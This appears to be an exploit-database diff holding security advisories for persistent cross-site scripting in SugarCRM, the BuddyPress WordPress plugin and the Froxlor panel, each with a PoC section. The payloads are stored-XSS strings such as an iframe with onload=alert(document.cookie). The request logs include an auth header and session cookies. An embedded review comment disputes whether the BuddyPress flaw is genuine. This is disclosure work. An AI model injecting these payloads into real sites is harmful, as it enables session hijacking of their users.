<input type="hidden" class="sugar_field" id="primary_address_city"
|
||||
value="a">
|
||||
<input type="hidden" class="sugar_field" id="primary_address_state"
|
||||
value="[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]">
|
||||
<input type="hidden" class="sugar_field" id="primary_address_country"
|
||||
value="y">
|
||||
<input type="hidden" class="sugar_field" id="primary_address_postalcode"
|
||||
value="p">
|
||||
</td><td class="dataField" width="1%">
|
||||
</td></tr>
|
||||
</tbody></table></td>
|
||||
<td scope="col" width="12.5%">
|
||||
Other Address:</td>
|
||||
<td width="37.5%">
|
||||
<table width="100%" cellspacing="0" cellpadding="0" border="0">
|
||||
<tbody><tr><td width="99%">
|
||||
<input type="hidden" class="sugar_field" id="alt_address_street" value="n">
|
||||
<input type="hidden" class="sugar_field" id="alt_address_city" value="a">
|
||||
<input type="hidden" class="sugar_field" id="alt_address_state"
|
||||
value=">"[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]">
|
||||
<input type="hidden" class="sugar_field" id="alt_address_country" value="k">
|
||||
<input type="hidden" class="sugar_field" id="alt_address_postalcode"
|
||||
value="r">
|
||||
</td>
|
||||
<td class="dataField" width="1%">
|
||||
</td>
|
||||
</tr>
|
||||
</tbody></table>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] ---
|
||||
https://sugar-crm.localhost:8000/index.php
|
||||
Host: sugar-crm.localhost:8000
|
||||
Accept:
|
||||
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 1336
|
||||
Origin: https://sugar-crm.localhost:8000
|
||||
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
|
||||
Connection: keep-alive
|
||||
Referer: https://sugar-crm.localhost:8000/index.php
|
||||
|
||||
Cookie: p7token=677939c76f1b303862ac57ac3592a50e; checkCookie=1;
|
||||
PHPWMADMINSESSID=di26ub5h6fegtndktcu4qbkhc1;
|
||||
PHPSESSID=t1glh0rluv1cl7h0oh4i1nius4; sugar_user_theme=Sugar5;
|
||||
ck_login_id_20=1; ck_login_language_20=en_us;
|
||||
EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125;
|
||||
EmailTreeLayout=42f3ef1b-3d1b-eac3-16a7-5eaeeeaae11c=false&
|
||||
713e7381-3309-2845-3c71-5eaeee59f0ca=false&be8b5121-f32c-13fd-cd9c-5eaeeec3b167=false&
|
||||
e3e40862-d8f3-77f0-f92e-5eaeee07eb24=false; Meetings_divs=history_v%3D%23
|
||||
-
|
||||
module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&isDuplicate=false&action=Save&return_module=Contacts&
|
||||
return_action=DetailView&return_id=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&module_tab=&contact_role=&relate_to=Contacts&
|
||||
relate_id=45ab08a6-6ca8-fd0f-c4cb5eaef0e0ef02&offset=1&opportunity_id=&case_id=&bug_id=&email_id=&inbound_email_id=&
|
||||
salutation=Mr.&first_name=nam23&last_name=e&phone_work=n&title=r&phone_mobile=h&department=t&phone_fax=k&account_name=&
|
||||
account_id=&primary_address_street=h&primary_address_city=z&
|
||||
primary_address_state=t<iframe src=evil.source
|
||||
onload=aler(document.cookie)>&primary_address_postalcode=b&
|
||||
primary_address_country=v&alt_address_street=h&alt_address_city=z&alt_address_state=t<iframe
|
||||
src=evil.source
|
||||
onload=alert(document.cookie)>&alt_address_postalcode=b&alt_address_country=v&alt_checkbox=on&Contacts_email_widget_id=0&
|
||||
emailAddressWidget=1&Contacts0emailAddress0=&Contacts0emailAddressId0=&
|
||||
Contacts0emailAddressPrimaryFlag=Contacts0emailAddress0&Contacts0emailAddressVerifiedFlag0=true&
|
||||
Contacts0emailAddressVerifiedValue0=&useEmailWidget=true&description=v<iframe
|
||||
src=a>&report_to_name=&
|
||||
reports_to_id=&sync_contact=0,1&lead_source=Web
|
||||
Site&do_not_call=0&campaign_name=&campaign_id=&
|
||||
assigned_user_name=h%20m&assigned_user_id=1
|
||||
-
|
||||
POST: HTTP/1.1 200 OK
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Location:
|
||||
index.php?action=DetailView&module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&offset=1
|
||||
Server: Microsoft-IIS/8.5
|
||||
Set-Cookie: ck_login_id_20=1; Max-Age=7776000; path=/;
|
||||
domain=sugar-crm.localhost:8000
|
||||
ck_login_language_20=en_us; Max-Age=7776000; path=/;
|
||||
domain=sugar-crm.localhost:8000
|
||||
sugar_user_theme=Sugar5; Max-Age=31536000
|
||||
X-Powered-By: ASP.NET
|
||||
Content-Length: 231
|
||||
|
||||
|
||||
https://sugar-crm.localhost:8000/index.php?module=Contacts&action=index
|
||||
https://sugar-crm.localhost:8000/index.php?module=Audit&action=Popup&query=true&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&module_name=Contacts
|
||||
https://sugar-crm.localhost:8000/index.php?module=Import&action=Step1&import_module=Contacts&return_module=Contacts&return_action=index
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched following the next steps ...
|
||||
1. Restrict the input fields and disallow special chars for the main
|
||||
name values displayed in the list
|
||||
2. Escape the input transmitted from the alternate and primary inputs
|
||||
3. Parse and sanitize the ouput location to ensure its filtered securely
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent cross site web vulnerability in the
|
||||
sugarcrm web-application is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab -
|
||||
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
Benjamin Kunz Mejri -
|
||||
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without
|
||||
any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability
|
||||
and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct,
|
||||
indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||
advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or
|
||||
incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||
www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com
|
||||
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||
youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php
|
||||
vulnerability-lab.com/rss/rss_upcoming.php
|
||||
vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php
|
||||
vulnerability-lab.com/register.php
|
||||
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this
|
||||
file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified
|
||||
form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||
All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the
|
||||
specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2020 | Vulnerability Laboratory - [Evolution
|
||||
Security GmbH]™
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
292
exploits/php/webapps/49061.txt
Normal file
|
@ -0,0 +1,292 @@
|
|||
# Exploit Title: WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
|
||||
# Exploit Author: Vulnerability-Lab
|
||||
# Date: 2020-11-13
|
||||
# Vendor Homepage: https://wordpress.org/plugins/buddypress/
|
||||
# Version: 6.2.0
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Buddypress v6.2.0 WP Plugin - Persistent Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2263
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2020-11-13
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2263
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
4.2
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Are you looking for modern, robust, and sophisticated social network
|
||||
software? BuddyPress is a suite of components that are common
|
||||
to a typical social network, and allows for great add-on features
|
||||
through WordPress’s extensive plugin system. Aimed at site builders
|
||||
& developers, BuddyPress is focused on ease of integration, ease of use,
|
||||
and extensibility. It is deliberately powerful yet unbelievably
|
||||
simple social network software, built by contributors to WordPress.
|
||||
|
||||
(Copy of the Homepage: https://wordpress.org/plugins/buddypress/ &
|
||||
https://buddypress.org/download/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent
|
||||
xss web vulnerability in the Buddypress v6.2.0 plugin for wordpress.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Buddypress
|
||||
Product: Buddypress v6.0.0 - v6.2.0 (Wordpress Plugin)
|
||||
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2020-11-13: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Moderator Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
No User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Independent Security Research
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in
|
||||
the Buddypress v6.0.0 - v6.2.0 plugin for wordpress.
|
||||
The vulnerability allows remote attackers to inject own malicious script
|
||||
codes with persistent attack vector to compromise
|
||||
browser to web-application requests from the application-side.
|
||||
|
||||
The persistent vulnerability is located in the `wp:html` name parameter
|
||||
of the `figure` content. Remote attackers with privileges
|
||||
are able to inject own malicious persistent script code as input to
|
||||
compromise the internal ui of the wordpress backend. The attacker
|
||||
injects his code and in case the admin or other privileged user account
|
||||
previews the content the code simple executes. The request method
|
||||
to inject is POST and the attack vector is located on the application-side.
|
||||
|
||||
Successful exploitation of the vulnerabilities results in session
|
||||
hijacking, persistent phishing attacks, persistent external
|
||||
redirects to malicious source and persistent manipulation of affected
|
||||
application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] wp:html
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] figure
|
||||
|
||||
Affected Module(s):
|
||||
[+] page_id=x&preview=true
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent web vulnerability can be exploited by remote attackers
|
||||
with privilged user accounts without user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the
|
||||
provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Inject
|
||||
https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
|
||||
|
||||
|
||||
PoC: Execute
|
||||
https://test23.localhost:8000/?page_id=6
|
||||
https://test23.localhost:8000/?page_id=6&preview=true
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
<div id="content" class="site-content">
|
||||
<div class="wrap">
|
||||
<div id="primary" class="content-area">
|
||||
<main id="main" class="site-main" role="main">
|
||||
<article id="post-6" class="post-6 page type-page status-draft hentry">
|
||||
<header class="entry-header">
|
||||
<h1 class="entry-title">Mitglieder</h1><span class="edit-link">
|
||||
<a class="post-edit-link"
|
||||
href="https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit">
|
||||
<span class="screen-reader-text">„Mitglieder“</span>
|
||||
bearbeiten</a></span> </header><!-- .entry-header -->
|
||||
<div class="entry-content">
|
||||
<p></p>
|
||||
<div class="wp-block-group"><div class="wp-block-group__inner-container">
|
||||
<div class="wp-block-group"><div
|
||||
class="wp-block-group__inner-container"></div></div>
|
||||
</div></div>
|
||||
<figure><iframe src="evil.source"
|
||||
onload="alert(document.cookie)"></iframe></figure>
|
||||
</div><!-- .entry-content -->
|
||||
</article><!-- #post-6 -->
|
||||
</main><!-- #main -->
|
||||
</div><!-- #primary -->
|
||||
</div><!-- .wrap -->
|
||||
</div>
|
||||
|
||||
|
||||
--- PoC Session Logs (POST) ---
|
||||
https://test23.localhost:8000/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F6&_locale=user
|
||||
Host: test23.localhost:8000
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)
|
||||
Gecko/20100101 Firefox/76.0
|
||||
Accept: application/json, */*;q=0.1
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Referer: https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit
|
||||
X-WP-Nonce: 04a953e188
|
||||
X-HTTP-Method-Override: PUT
|
||||
Content-Type: application/json
|
||||
Origin: https://test23.localhost:8000
|
||||
Content-Length: 614
|
||||
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
|
||||
Connection: keep-alive
|
||||
Cookie:
|
||||
g3sid=bdbf56f2335bbce0720f03ed25343b66db61b54a%7E6a5nrndvh14i5kb09tfrl7afe2;
|
||||
wordpress_test_cookie=WP+Cookie+check;
|
||||
wordpress_logged_in_55a3fb1cb724d159a111224c7f110400=admin_f507c7w4%7C1589912472%7CxTSn77nlwpdxYR8NUaJOXfQM9ShaBlSLzP7Anix
|
||||
xNt8%7C557ca2874863d9f1f6a8316659798e11558a01ffc8671eea68d496aa5df99b17;
|
||||
wp-settings-time-1=1589740723
|
||||
{"id":6,"content":"<!-- wp:paragraph -->n<p></p>n<!-- /wp:paragraph
|
||||
-->nn<!-- wp:group -->n<div class="wp-block-group">
|
||||
<div class="wp-block-group__inner-container"><!-- wp:group -->n<div
|
||||
class="wp-block-group"><div class="wp-block-group__inner-container">
|
||||
<!-- wp:block {"ref":"reusable1"} /--></div></div>n<!-- /wp:group
|
||||
--></div></div>n<!-- /wp:group -->nn
|
||||
<!-- wp:block {"ref":"reusable1"} /-->nn<!-- wp:block
|
||||
{"ref":"reusable1"} /-->nn
|
||||
<!-- wp:html -->n<figure><iframe src="evil.source"
|
||||
onload="alert(document.cookie)"></iframe></figure>n<!-- /wp:html
|
||||
-->nn<!-- wp:bp/member /-->"}
|
||||
-
|
||||
POST: HTTP/1.1 200 OK
|
||||
Cache-Control: no-cache, must-revalidate, max-age=0
|
||||
Allow: GET, POST, PUT, PATCH, DELETE
|
||||
Content-Type: application/json; charset=UTF-8
|
||||
Vary: Origin
|
||||
Server: Microsoft-IIS/8.5
|
||||
X-Robots-Tag: noindex
|
||||
Link: <https://test23.localhost:8000/index.php?rest_route=/>;
|
||||
rel="https://api.w.org/"
|
||||
Content-Length: 3108
|
||||
|
||||
|
||||
References:
|
||||
https://test23.localhost:8000/index.php
|
||||
https://test23.localhost:8000/wp-admin/post.php
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent input validation web vulnerability
|
||||
in the web-application is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] -
|
||||
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without
|
||||
any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability
|
||||
and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct,
|
||||
indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||
advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or
|
||||
incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||
www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com
|
||||
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||
youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php
|
||||
vulnerability-lab.com/rss/rss_upcoming.php
|
||||
vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php
|
||||
vulnerability-lab.com/register.php
|
||||
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this
|
||||
file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified
|
||||
form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||
All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the
|
||||
specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2020 | Vulnerability Laboratory - [Evolution
|
||||
Security GmbH]™
|
||||
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
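Review bot: The PoC session log is a PUT to WordPress core's `rest_route=/wp/v2/pages/6` storing a `wp:html` block, and nothing in the request or in the rendered "Vulnerable Source" exercises BuddyPress code beyond the `<!-- wp:bp/member /-->` block reference, so the advisory does not show that BuddyPress introduces the missing filtering. Users holding WordPress's `unfiltered_html` capability (administrators, and editors on single-site installs) are allowed to store raw script in their own posts by design, which would make this expected behaviour rather than a plugin flaw; the advisory should either reproduce it from a role without `unfiltered_html` (Contributor or Author) or name the BuddyPress code path that bypasses the `wp_kses` filtering. "No User Interaction" also conflicts with the execution condition "in case the admin or other privileged user account previews the content" — a privileged victim has to open the page, so this is at least low interaction. The session log additionally publishes a Basic credential and a live `wordpress_logged_in_*` cookie for the test host; those should be redacted before publication.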
|
301
exploits/php/webapps/49063.txt
Normal file
|
@ -0,0 +1,301 @@
|
|||
# Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
|
||||
# Exploit Author: Vulnerability-Lab
|
||||
# Date: 2020-11-12
|
||||
# Vendor Homepage: https://froxlor.org/
|
||||
# Software Link: https://froxlor.org/download/
|
||||
# Version: 0.10.16
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Froxlor v0.10.16 CP - (Customer) Persistent Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2241
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2020-11-12
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2241
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.2
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
1.000€ - 2.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Froxlor Server Management Panel, the lightweight server management
|
||||
software for your needs. Developed by experienced server
|
||||
administrators, this open source (GPL) panel simplifies the effort of
|
||||
managing your hosting. Manage reseller ressources and
|
||||
limit what the customers may use in the dedicated customerpanel. MySQL
|
||||
management, Directory protection & settings management.
|
||||
|
||||
(Copy of the Homepage: https://froxlor.org/index.php &
|
||||
https://froxlor.org/download/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent
|
||||
cross site vulnerability in the Froxlor Server Management Panel v0.10.16.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Froxlor Team
|
||||
Product: Froxlor v0.10.16 (Stable) - Server Management Panel (Control Panel)
|
||||
Affected Packages: Gentoo, Debian & Ubuntu
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2020-05-01: Researcher Notification & Coordination (Security Researcher)
|
||||
2020-05-02: Vendor Notification (Security Department)
|
||||
2020-05-13: Vendor Response/Feedback (Security Department)
|
||||
2020-10-12: Vendor Fix/Patch (Service Developer Team)
|
||||
****-**-**: Security Acknowledgements (Security Department)
|
||||
2020-11-12: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Guest Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Low User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Full Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in
|
||||
the Froxlor Server Management Panel v0.10.16 web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script
|
||||
codes with persistent attack vector to compromise browser
|
||||
to web-application requests from the application-side.
|
||||
|
||||
The persistent cross site web vulnerability is located in the
|
||||
`username`, `name` and `firstname` input fields of the customer
|
||||
add or registration module. Remote attackers are able to add customers
|
||||
with malicious script code as firstname or name to
|
||||
manipulate in the backend the `admin_customers.php` and `customers.php`
|
||||
files. The injection point is the registration
|
||||
or customer add/edit module and the execution occurs on preview of the
|
||||
traffic module in the admin backend. The request
|
||||
method to inject is POST and the attack vector is persistent located on
|
||||
the application-side. In a valid attack case the
|
||||
remote attacker uses a customer or reseller account to inject the
|
||||
payload as name to provoke an execute in the insecure
|
||||
backend module.
|
||||
|
||||
Successful exploitation of the vulnerability results in session
|
||||
hijacking, persistent phishing attacks, persistent external
|
||||
redirects to malicious source and persistent manipulation of affected
|
||||
application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Username
|
||||
[+] Name
|
||||
[+] Firstname
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Customers
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] name
|
||||
[+] firstname
|
||||
|
||||
Affected File(s):
|
||||
[+] admin_customers.php
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation vulnerability can be exploited by remote
|
||||
attackers with low privilege user account and with low user interaction.
|
||||
For security demonstration or to reproduce the security web
|
||||
vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Register or login with a low privilege user account
|
||||
2. Open the profile account section
|
||||
3. Change the name and firstname or include in the registration process
|
||||
Note: Inject test payload to vulnerable marked input fields
|
||||
4. Save or submit the input via form
|
||||
5. Wait until an admin or higher privileged user role opens the traffic
|
||||
stats to execute
|
||||
6. Successful reproduce of the persistent input validation web
|
||||
vulnerability!
|
||||
|
||||
|
||||
PoC: Payload (Exploitation)
|
||||
test%20>"<script alert(document.cookie)></script>div style=1
|
||||
|
||||
|
||||
PoC: Vulnerable Sources (Execution Points) [admin_customers.php or
|
||||
customers.php to admin_traffic.php via Name & Firstname]
|
||||
<tr role="row">
|
||||
<td>>">test%20>"<script alert(document.cookie)></script>div
|
||||
style=1[MALICIOUS SCRIPT CODE EXECUTION POINT!]
|
||||
<a
|
||||
href="admin_customers.php?s=9e20410f4871894db51f11258d5c4b3b&target=traffic&page=customers&action=su&id=2"
|
||||
|
||||
rel="external" target="_blank">[Details]</a></td>
|
||||
<td><small>-</small></td>
|
||||
</tr><tr role="row">
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] --- (Reseller Account to Admin)
|
||||
https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20
|
||||
Host: froxlor.localhost:8080
|
||||
Accept:
|
||||
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 879
|
||||
Origin: https://froxlor.localhost:8080
|
||||
Connection: keep-alive
|
||||
Referer:
|
||||
https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add
|
||||
Cookie: PHPSESSID=c34ist63ukv1vq9vt5m1hfumpo
|
||||
s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add&send=send&
|
||||
new_loginname=test1%20>"<script alert(document.cookie)></script>div
|
||||
style=1&createstdsubdomain=0,1&
|
||||
store_defaultindex=0,1&new_customer_password=KwhyqgzvPo&
|
||||
new_customer_password_suggestion=KwhyqgzvPo&sendpassword=0,1&def_language=English&api_allowed=0,1&
|
||||
name=btest%20>"<script alert(document.cookie)></script>div style=1&
|
||||
firstname=ctest%20>"<script alert(document.cookie)></script>div
|
||||
style=1&gender=0&
|
||||
company=&street=&zipcode=&city=&phone=&fax=&email=trest@aol.de&customernumber=&
|
||||
custom_notes=&custom_notes_show=0&diskspace=0&traffic=0&subdomains=0&emails=0&email_accounts=0&
|
||||
email_forwarders=0&email_imap=0,1&email_pop3=0,1&ftps=0&mysqls=0&phpenabled=0,1&allowed_phpconfigs[]=1&
|
||||
perlenabled=0&dnsenabled=0&logviewenabled=0
|
||||
-
|
||||
POST: HTTP/2.0 200 OK
|
||||
server: Apache
|
||||
vary: Accept-Encoding
|
||||
content-encoding: gzip
|
||||
content-length: 1393
|
||||
content-type: text/html; charset=UTF-8
|
||||
|
||||
|
||||
Reference(s):
|
||||
https://froxlor.localhost:8080/
|
||||
https://froxlor.localhost:8080/admin_traffic.php
|
||||
https://froxlor.localhost:8080/admin_traffic.php?s=[x]&page=customers
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by follwing the next steps ...
|
||||
1. Validate and escape the content of the vulnerable username, name and
|
||||
firstname input fields
|
||||
2. Restrict the input fields and disallow specialchars on inputs to filter
|
||||
3. Parse the two output location and escape or secure encode the content
|
||||
4. Encode in the edit formular the results on check
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the persistent validation web vulnerability in the
|
||||
web-application is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab -
|
||||
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
Benjamin Kunz Mejri -
|
||||
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without
|
||||
any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability
|
||||
and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct,
|
||||
indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been
|
||||
advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or
|
||||
incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com
|
||||
www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com
|
||||
paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
|
||||
youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php
|
||||
vulnerability-lab.com/rss/rss_upcoming.php
|
||||
vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php
|
||||
vulnerability-lab.com/register.php
|
||||
vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this
|
||||
file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified
|
||||
form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
|
||||
All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the
|
||||
specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
